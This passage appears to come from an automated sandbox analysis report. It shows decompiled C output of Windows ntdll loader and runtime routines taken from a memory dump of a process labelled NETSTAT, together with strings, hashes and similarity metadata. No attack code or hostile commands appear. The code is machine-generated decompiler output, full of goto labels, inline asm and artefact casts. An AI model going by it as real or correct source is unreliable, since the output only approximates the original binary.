                												E03368999(_t128,  &_v12);
                												_t147 = _v12;
                												_t91 = 0;
                												__eflags = 0;
                												_t129 =  *_t147;
                												while(1) {
                													__eflags =  *((intOrPtr*)(0x3445c60 + _t91 * 8)) - _t129;
                													if( *((intOrPtr*)(0x3445c60 + _t91 * 8)) == _t129) {
                														break;
                													}
                													_t91 = _t91 + 1;
                													__eflags = _t91 - 5;
                													if(_t91 < 5) {
                														continue;
                													} else {
                														_t131 = 0;
                														__eflags = 0;
                													}
                													L37:
                													__eflags = _t131;
                													if(_t131 != 0) {
                														goto L22;
                													} else {
                														__eflags = _v16 - _t147;
                														if(_v16 != _t147) {
                															goto L22;
                														} else {
                															E03372280(_t92, 0x34486cc);
                															_t94 = E03429DFB( &_v20);
                															__eflags = _t94 - 1;
                															if(_t94 != 1) {
                															}
                															asm("movsd");
                															asm("movsd");
                															asm("movsd");
                															asm("movsd");
                															 *_t118 =  *_t118 + 1;
                															asm("adc dword [ebx+0x4], 0x0");
                															_t95 = E033861A0( &_v32);
                															__eflags = _t95;
                															if(_t95 != 0) {
                																__eflags = _v32 | _v28;
                																if((_v32 | _v28) != 0) {
                																	_t71 = _t118 + 0x40; // 0x3f
                																	_t134 = _t71;
                																	goto L55;
                																}
                															}
                															goto L30;
                														}
                													}
                													goto L56;
                												}
                												_t92 = 0x3445c64 + _t91 * 8;
                												asm("lock xadd [eax], ecx");
                												_t131 = (_t129 | 0xffffffff) - 1;
                												goto L37;
                											}
                										}
                										goto L56;
                									} else {
                										_t143 = E03368A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                										__eflags = _t143;
                										if(_t143 != 0) {
                											_t157 = _v12;
                											_t103 = 0;
                											__eflags = 0;
                											_t136 =  &(_t157[1]);
                											 *(_t161 + 0x64) = _t136;
                											_t151 =  *_t157;
                											_v20 = _t136;
                											while(1) {
                												__eflags =  *((intOrPtr*)(0x3445c60 + _t103 * 8)) - _t151;
                												if( *((intOrPtr*)(0x3445c60 + _t103 * 8)) == _t151) {
                													break;
                												}
                												_t103 = _t103 + 1;
                												__eflags = _t103 - 5;
                												if(_t103 < 5) {
                													continue;
                												}
                												L21:
                												_t105 = E0339F380(_t136, 0x3331184, 0x10);
                												__eflags = _t105;
                												if(_t105 != 0) {
                													__eflags =  *_t157 -  *_v16;
                													if( *_t157 >=  *_v16) {
                														goto L22;
                													} else {
                														asm("cdq");
                														_t166 = _t157[5] & 0x0000ffff;
                														_t108 = _t157[5] & 0x0000ffff;
                														asm("cdq");
                														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                														if(__eflags > 0) {
                															L29:
                															E03372280(_t108, 0x34486cc);
                															 *_t118 =  *_t118 + 1;
                															_t42 = _t118 + 0x40; // 0x3f
                															_t156 = _t42;
                															asm("adc dword [ebx+0x4], 0x0");
                															asm("movsd");
                															asm("movsd");
                															asm("movsd");
                															asm("movsd");
                															_t110 = E033861A0( &_v32);
                															__eflags = _t110;
                															if(_t110 != 0) {
                																__eflags = _v32 | _v28;
                																if((_v32 | _v28) != 0) {
                																	_t134 = _v20;
                																	L55:
                																	E03429D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                																}
                															}
                															L30:
                															 *_t118 =  *_t118 + 1;
                															asm("adc dword [ebx+0x4], 0x0");
                															E0336FFB0(_t118, _t156, 0x34486cc);
                															goto L22;
                														} else {
                															if(__eflags < 0) {
                																goto L22;
                															} else {
                																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                																	goto L22;
                																} else {
                																	goto L29;
                																}
                															}
                														}
                													}
                													goto L56;
                												}
                												goto L22;
                											}
                											asm("lock inc dword [eax]");
                											goto L21;
                										}
                									}
                								}
                							}
                						}
                						return _t143;
                					}
                				} else {
                					_push( &_v8);
                					_push( *((intOrPtr*)(__ecx + 0x50)));
                					_push(__ecx + 0x40);
                					_push(_t121);
                					_push(0xffffffff);
                					_t80 = E03399A00();
                					_t159 = _t80;
                					if(_t159 < 0) {
                						L8:
                						return _t80;
                					} else {
                						goto L2;
                					}
                				}
                				L56:
                			}


                Strings
                • LdrpDoPostSnapWork, xrefs: 033B9C1E
                • minkernel\ntdll\ldrsnap.c, xrefs: 033B9C28
                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 033B9C18
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                • API String ID: 0-1948996284
                • Opcode ID: 89bffc1daa3722efc0b0f9b61af86bb6589d8854698d2ed4dee7d245f2f784cf
                • Instruction ID: 60c84ad6cf15bc0a95627ba67cfc80f61d8b6654ab7a5bbe8d3beab93975fb85
                • Opcode Fuzzy Hash: 89bffc1daa3722efc0b0f9b61af86bb6589d8854698d2ed4dee7d245f2f784cf
                • Instruction Fuzzy Hash: 8B91F435A00215DFDF28DF58C8C1ABAB3F9FF89311B1880A9E915AF649D730E901CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E03367E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                				char _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				char _v24;
                				signed int _t73;
                				void* _t77;
                				char* _t82;
                				char* _t87;
                				signed char* _t97;
                				signed char _t102;
                				intOrPtr _t107;
                				signed char* _t108;
                				intOrPtr _t112;
                				intOrPtr _t124;
                				intOrPtr _t125;
                				intOrPtr _t126;
                
                				_t107 = __edx;
                				_v12 = __ecx;
                				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                				_t124 = 0;
                				_v20 = __edx;
                				if(E0336CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                					_t112 = _v8;
                				} else {
                					_t112 = 0;
                					_v8 = 0;
                				}
                				if(_t112 != 0) {
                					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                						_t124 = 0xc000007b;
                						goto L8;
                					}
                					_t73 =  *(_t125 + 0x34) | 0x00400000;
                					 *(_t125 + 0x34) = _t73;
                					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                						goto L3;
                					}
                					 *(_t125 + 0x34) = _t73 | 0x01000000;
                					_t124 = E0335C9A4( *((intOrPtr*)(_t125 + 0x18)));
                					if(_t124 < 0) {
                						goto L8;
                					} else {
                						goto L3;
                					}
                				} else {
                					L3:
                					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                						L8:
                						return _t124;
                					}
                					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                							goto L5;
                						}
                						_t102 =  *0x3445780; // 0x0
                						if((_t102 & 0x00000003) != 0) {
                							E033D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                							_t102 =  *0x3445780; // 0x0
                						}
                						if((_t102 & 0x00000010) != 0) {
                							asm("int3");
                						}
                						_t124 = 0xc0000428;
                						goto L8;
                					}
                					L5:
                					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                						goto L8;
                					}
                					_t77 = _a4 - 0x40000003;
                					if(_t77 == 0 || _t77 == 0x33) {
                						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                						if(E03377D50() != 0) {
                							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                						} else {
                							_t82 = 0x7ffe0384;
                						}
                						_t108 = 0x7ffe0385;
                						if( *_t82 != 0) {
                							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                								if(E03377D50() == 0) {
                									_t97 = 0x7ffe0385;
                								} else {
                									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                								}
                								if(( *_t97 & 0x00000020) != 0) {
                									E033D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                								}
                							}
                						}
                						if(_a4 != 0x40000003) {
                							L14:
                							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                							if(E03377D50() != 0) {
                								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                							} else {
                								_t87 = 0x7ffe0384;
                							}
                							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                								if(E03377D50() != 0) {
                									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                								}
                								if(( *_t108 & 0x00000020) != 0) {
                									E033D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                								}
                							}
                							goto L8;
                						} else {
                							_v16 = _t125 + 0x24;
                							_t124 = E0338A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                							if(_t124 < 0) {
                								E0335B1E1(_t124, 0x1490, 0, _v16);
                								goto L8;
                							}
                							goto L14;
                						}
                					} else {
                						goto L8;
                					}
                				}
                			}


                Strings
                • Could not validate the crypto signature for DLL %wZ, xrefs: 033B9891
                • minkernel\ntdll\ldrmap.c, xrefs: 033B98A2
                • LdrpCompleteMapModule, xrefs: 033B9898
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                • API String ID: 0-1676968949
                • Opcode ID: 69034a6a1836b2d8ab07b64dec80bb6b5d6ceb67c42dc5146e08aad1cb9795b9
                • Instruction ID: 6777c02de86f6503bbccec14d8918578946fa6ca3a8d4b61eebf0096b33ab7fa
                • Opcode Fuzzy Hash: 69034a6a1836b2d8ab07b64dec80bb6b5d6ceb67c42dc5146e08aad1cb9795b9
                • Instruction Fuzzy Hash: 5F510231A007419FDB21CB68CDC4B6AB7F8AB01718F4846A9EA51DBBE5D734ED04C790
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E0335E620(void* __ecx, short* __edx, short* _a4) {
                				char _v16;
                				char _v20;
                				intOrPtr _v24;
                				char* _v28;
                				char _v32;
                				char _v36;
                				char _v44;
                				signed int _v48;
                				intOrPtr _v52;
                				void* _v56;
                				void* _v60;
                				char _v64;
                				void* _v68;
                				void* _v76;
                				void* _v84;
                				signed int _t59;
                				signed int _t74;
                				signed short* _t75;
                				signed int _t76;
                				signed short* _t78;
                				signed int _t83;
                				short* _t93;
                				signed short* _t94;
                				short* _t96;
                				void* _t97;
                				signed int _t99;
                				void* _t101;
                				void* _t102;
                
                				_t80 = __ecx;
                				_t101 = (_t99 & 0xfffffff8) - 0x34;
                				_t96 = __edx;
                				_v44 = __edx;
                				_t78 = 0;
                				_v56 = 0;
                				if(__ecx == 0 || __edx == 0) {
                					L28:
                					_t97 = 0xc000000d;
                				} else {
                					_t93 = _a4;
                					if(_t93 == 0) {
                						goto L28;
                					}
                					_t78 = E0335F358(__ecx, 0xac);
                					if(_t78 == 0) {
                						_t97 = 0xc0000017;
                						L6:
                						if(_v56 != 0) {
                							_push(_v56);
                							E033995D0();
                						}
                						if(_t78 != 0) {
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                						}
                						return _t97;
                					}
                					E0339FA60(_t78, 0, 0x158);
                					_v48 = _v48 & 0x00000000;
                					_t102 = _t101 + 0xc;
                					 *_t96 = 0;
                					 *_t93 = 0;
                					E0339BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                					_v36 = 0x18;
                					_v28 =  &_v44;
                					_v64 = 0;
                					_push( &_v36);
                					_push(0x20019);
                					_v32 = 0;
                					_push( &_v64);
                					_v24 = 0x40;
                					_v20 = 0;
                					_v16 = 0;
                					_t97 = E03399600();
                					if(_t97 < 0) {
                						goto L6;
                					}
                					E0339BB40(0,  &_v36, L"InstallLanguageFallback");
                					_push(0);
                					_v48 = 4;
                					_t97 = L0335F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                					if(_t97 >= 0) {
                						if(_v52 != 1) {
                							L17:
                							_t97 = 0xc0000001;
                							goto L6;
                						}
                						_t59 =  *_t78 & 0x0000ffff;
                						_t94 = _t78;
                						_t83 = _t59;
                						if(_t59 == 0) {
                							L19:
                							if(_t83 == 0) {
                								L23:
                								E0339BB40(_t83, _t102 + 0x24, _t78);
                								if(L033643C0( &_v48,  &_v64) == 0) {
                									goto L17;
                								}
                								_t84 = _v48;
                								 *_v48 = _v56;
                								if( *_t94 != 0) {
                									E0339BB40(_t84, _t102 + 0x24, _t94);
                									if(L033643C0( &_v48,  &_v64) != 0) {
                										 *_a4 = _v56;
                									} else {
                										_t97 = 0xc0000001;
                										 *_v48 = 0;
                									}
                								}
                								goto L6;
                							}
                							_t83 = _t83 & 0x0000ffff;
                							while(_t83 == 0x20) {
                								_t94 =  &(_t94[1]);
                								_t74 =  *_t94 & 0x0000ffff;
                								_t83 = _t74;
                								if(_t74 != 0) {
                									continue;
                								}
                								goto L23;
                							}
                							goto L23;
                						} else {
                							goto L14;
                						}
                						while(1) {
                							L14:
                							_t27 =  &(_t94[1]); // 0x2
                							_t75 = _t27;
                							if(_t83 == 0x2c) {
                								break;
                							}
                							_t94 = _t75;
                							_t76 =  *_t94 & 0x0000ffff;
                							_t83 = _t76;
                							if(_t76 != 0) {
                								continue;
                							}
                							goto L23;
                						}
                						 *_t94 = 0;
                						_t94 = _t75;
                						_t83 =  *_t75 & 0x0000ffff;
                						goto L19;
                					}
                				}
                			}

                Strings
                • InstallLanguageFallback, xrefs: 0335E6DB
                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0335E68C
                • @, xrefs: 0335E6C0
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                • API String ID: 0-1757540487
                • Opcode ID: 2caa95b195dc5cf2ed4e46e86536781a9037aba7198b0eda88b722e10500730e
                • Instruction ID: 932bc76ff97626a729150e4b07f2b38cdda4273812b00fc86b5a7ed51a9bb0bb
                • Opcode Fuzzy Hash: 2caa95b195dc5cf2ed4e46e86536781a9037aba7198b0eda88b722e10500730e
                • Instruction Fuzzy Hash: 2E51D2769043459BE714DF25C8C0ABBB3E8BF89614F09096EF985D7640FB34DA44C7A2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E033D51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                				signed short* _t63;
                				signed int _t64;
                				signed int _t65;
                				signed int _t67;
                				intOrPtr _t74;
                				intOrPtr _t84;
                				intOrPtr _t88;
                				intOrPtr _t94;
                				void* _t100;
                				void* _t103;
                				intOrPtr _t105;
                				signed int _t106;
                				short* _t108;
                				signed int _t110;
                				signed int _t113;
                				signed int* _t115;
                				signed short* _t117;
                				void* _t118;
                				void* _t119;
                
                				_push(0x80);
                				_push(0x34305f0);
                				E033AD0E8(__ebx, __edi, __esi);
                				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                				_t115 =  *(_t118 + 0xc);
                				 *(_t118 - 0x7c) = _t115;
                				 *((char*)(_t118 - 0x65)) = 0;
                				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                				_t113 = 0;
                				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                				 *((intOrPtr*)(_t118 - 4)) = 0;
                				_t100 = __ecx;
                				if(_t100 == 0) {
                					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                					E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                					 *((char*)(_t118 - 0x65)) = 1;
                					_t63 =  *(_t118 - 0x90);
                					_t101 = _t63[2];
                					_t64 =  *_t63 & 0x0000ffff;
                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                					L20:
                					_t65 = _t64 >> 1;
                					L21:
                					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                					if(_t108 == 0) {
                						L27:
                						 *_t115 = _t65 + 1;
                						_t67 = 0xc0000023;
                						L28:
                						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                						L29:
                						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                						E033D53CA(0);
                						return E033AD130(0, _t113, _t115);
                					}
                					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                							 *_t108 = 0;
                						}
                						goto L27;
                					}
                					 *_t115 = _t65;
                					_t115 = _t65 + _t65;
                					E0339F3E0(_t108, _t101, _t115);
                					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                					_t67 = 0;
                					goto L28;
                				}
                				_t103 = _t100 - 1;
                				if(_t103 == 0) {
                					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                					_t74 = E03373690(1, _t117, 0x3331810, _t118 - 0x74);
                					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                					_t101 = _t117[2];
                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                					if(_t74 < 0) {
                						_t64 =  *_t117 & 0x0000ffff;
                						_t115 =  *(_t118 - 0x7c);
                						goto L20;
                					}
                					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                					_t115 =  *(_t118 - 0x7c);
                					goto L21;
                				}
                				if(_t103 == 1) {
                					_t105 = 4;
                					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                					_push(_t118 - 0x70);
                					_push(0);
                					_push(0);
                					_push(_t105);
                					_push(_t118 - 0x78);
                					_push(0x6b);
                					 *((intOrPtr*)(_t118 - 0x64)) = E0339AA90();
                					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                					_t113 = L03374620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                					if(_t113 != 0) {
                						_push(_t118 - 0x70);
                						_push( *((intOrPtr*)(_t118 - 0x70)));
                						_push(_t113);
                						_push(4);
                						_push(_t118 - 0x78);
                						_push(0x6b);
                						_t84 = E0339AA90();
                						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                						if(_t84 < 0) {
                							goto L29;
                						}
                						_t110 = 0;
                						_t106 = 0;
                						while(1) {
                							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                							 *(_t118 - 0x88) = _t106;
                							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                								break;
                							}
                							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                							_t106 = _t106 + 1;
                						}
                						_t88 = E033D500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                						_t119 = _t119 + 0x1c;
                						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                						if(_t88 < 0) {
                							goto L29;
                						}
                						_t101 = _t118 - 0x3c;
                						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                						goto L21;
                					}
                					_t67 = 0xc0000017;
                					goto L28;
                				}
                				_push(0);
                				_push(0x20);
                				_push(_t118 - 0x60);
                				_push(0x5a);
                				_t94 = E03399860();
                				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                				if(_t94 < 0) {
                					goto L29;
                				}
                				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                					_t101 = L"Legacy";
                					_push(6);
                				} else {
                					_t101 = L"UEFI";
                					_push(4);
                				}
                				_pop(_t65);
                				goto L21;
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Legacy$UEFI
                • API String ID: 2994545307-634100481
                • Opcode ID: 3e2990f24c2beeb80932a3b12f4e6ee15b402c38ace8a6f11bece081b53d2fbc
                • Instruction ID: f84b082680cd5e1a73f198dce6d57aacb41c9bc161d4629a3b1e92f52ad6c63e
                • Opcode Fuzzy Hash: 3e2990f24c2beeb80932a3b12f4e6ee15b402c38ace8a6f11bece081b53d2fbc
                • Instruction Fuzzy Hash: A2515AB6E007089FEB24DFA89880BAEBBB8FB49700F14402DE559EB651D771D900CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E0335B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                				signed int _t65;
                				signed short _t69;
                				intOrPtr _t70;
                				signed short _t85;
                				void* _t86;
                				signed short _t89;
                				signed short _t91;
                				intOrPtr _t92;
                				intOrPtr _t97;
                				intOrPtr* _t98;
                				signed short _t99;
                				signed short _t101;
                				void* _t102;
                				char* _t103;
                				signed short _t104;
                				intOrPtr* _t110;
                				void* _t111;
                				void* _t114;
                				intOrPtr* _t115;
                
                				_t109 = __esi;
                				_t108 = __edi;
                				_t106 = __edx;
                				_t95 = __ebx;
                				_push(0x90);
                				_push(0x342f7a8);
                				E033AD0E8(__ebx, __edi, __esi);
                				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                				if(__edx == 0xffffffff) {
                					L6:
                					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                					__eflags = _t65 & 0x00000002;
                					if((_t65 & 0x00000002) != 0) {
                						L3:
                						L4:
                						return E033AD130(_t95, _t108, _t109);
                					}
                					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                					_t108 = 0;
                					_t109 = 0;
                					_t95 = 0;
                					__eflags = 0;
                					while(1) {
                						__eflags = _t95 - 0x200;
                						if(_t95 >= 0x200) {
                							break;
                						}
                						E0339D000(0x80);
                						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                						_t108 = _t115;
                						_t95 = _t95 - 0xffffff80;
                						_t17 = _t114 - 4;
                						 *_t17 =  *(_t114 - 4) & 0x00000000;
                						__eflags =  *_t17;
                						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                						_t102 = _t110 + 1;
                						do {
                							_t85 =  *_t110;
                							_t110 = _t110 + 1;
                							__eflags = _t85;
                						} while (_t85 != 0);
                						_t111 = _t110 - _t102;
                						_t21 = _t95 - 1; // -129
                						_t86 = _t21;
                						__eflags = _t111 - _t86;
                						if(_t111 > _t86) {
                							_t111 = _t86;
                						}
                						E0339F3E0(_t108, _t106, _t111);
                						_t115 = _t115 + 0xc;
                						_t103 = _t111 + _t108;
                						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                						_t89 = _t95 - _t111;
                						__eflags = _t89;
                						_push(0);
                						if(_t89 == 0) {
                							L15:
                							_t109 = 0xc000000d;
                							goto L16;
                						} else {
                							__eflags = _t89 - 0x7fffffff;
                							if(_t89 <= 0x7fffffff) {
                								L16:
                								 *(_t114 - 0x94) = _t109;
                								__eflags = _t109;
                								if(_t109 < 0) {
                									__eflags = _t89;
                									if(_t89 != 0) {
                										 *_t103 = 0;
                									}
                									L26:
                									 *(_t114 - 0xa0) = _t109;
                									 *(_t114 - 4) = 0xfffffffe;
                									__eflags = _t109;
                									if(_t109 >= 0) {
                										L31:
                										_t98 = _t108;
                										_t39 = _t98 + 1; // 0x1
                										_t106 = _t39;
                										do {
                											_t69 =  *_t98;
                											_t98 = _t98 + 1;
                											__eflags = _t69;
                										} while (_t69 != 0);
                										_t99 = _t98 - _t106;
                										__eflags = _t99;
                										L34:
                										_t70 =  *[fs:0x30];
                										__eflags =  *((char*)(_t70 + 2));
                										if( *((char*)(_t70 + 2)) != 0) {
                											L40:
                											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                											 *(_t114 - 4) = 1;
                											_push(_t114 - 0x74);
                											L033ADEF0(_t99, _t106);
                											 *(_t114 - 4) = 0xfffffffe;
                											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                											goto L3;
                										}
                										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                											goto L40;
                										}
                										_push( *((intOrPtr*)(_t114 + 8)));
                										_push( *((intOrPtr*)(_t114 - 0x9c)));
                										_push(_t99 & 0x0000ffff);
                										_push(_t108);
                										_push(1);
                										_t101 = E0339B280();
                										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                										if( *((char*)(_t114 + 0x14)) == 1) {
                											__eflags = _t101 - 0x80000003;
                											if(_t101 == 0x80000003) {
                												E0339B7E0(1);
                												_t101 = 0;
                												__eflags = 0;
                											}
                										}
                										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                										goto L4;
                									}
                									__eflags = _t109 - 0x80000005;
                									if(_t109 == 0x80000005) {
                										continue;
                									}
                									break;
                								}
                								 *(_t114 - 0x90) = 0;
                								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                								_t91 = E0339E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                								_t115 = _t115 + 0x10;
                								_t104 = _t91;
                								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                								__eflags = _t104;
                								if(_t104 < 0) {
                									L21:
                									_t109 = 0x80000005;
                									 *(_t114 - 0x90) = 0x80000005;
                									L22:
                									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                									L23:
                									 *(_t114 - 0x94) = _t109;
                									goto L26;
                								}
                								__eflags = _t104 - _t92;
                								if(__eflags > 0) {
                									goto L21;
                								}
                								if(__eflags == 0) {
                									goto L22;
                								}
                								goto L23;
                							}
                							goto L15;
                						}
                					}
                					__eflags = _t109;
                					if(_t109 >= 0) {
                						goto L31;
                					}
                					__eflags = _t109 - 0x80000005;
                					if(_t109 != 0x80000005) {
                						goto L31;
                					}
                					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                					_t38 = _t95 - 1; // -129
                					_t99 = _t38;
                					goto L34;
                				}
                				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                					__eflags = __edx - 0x65;
                					if(__edx != 0x65) {
                						goto L2;
                					}
                					goto L6;
                				}
                				L2:
                				_push( *((intOrPtr*)(_t114 + 8)));
                				_push(_t106);
                				if(E0339A890() != 0) {
                					goto L6;
                				}
                				goto L3;
                			}


                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
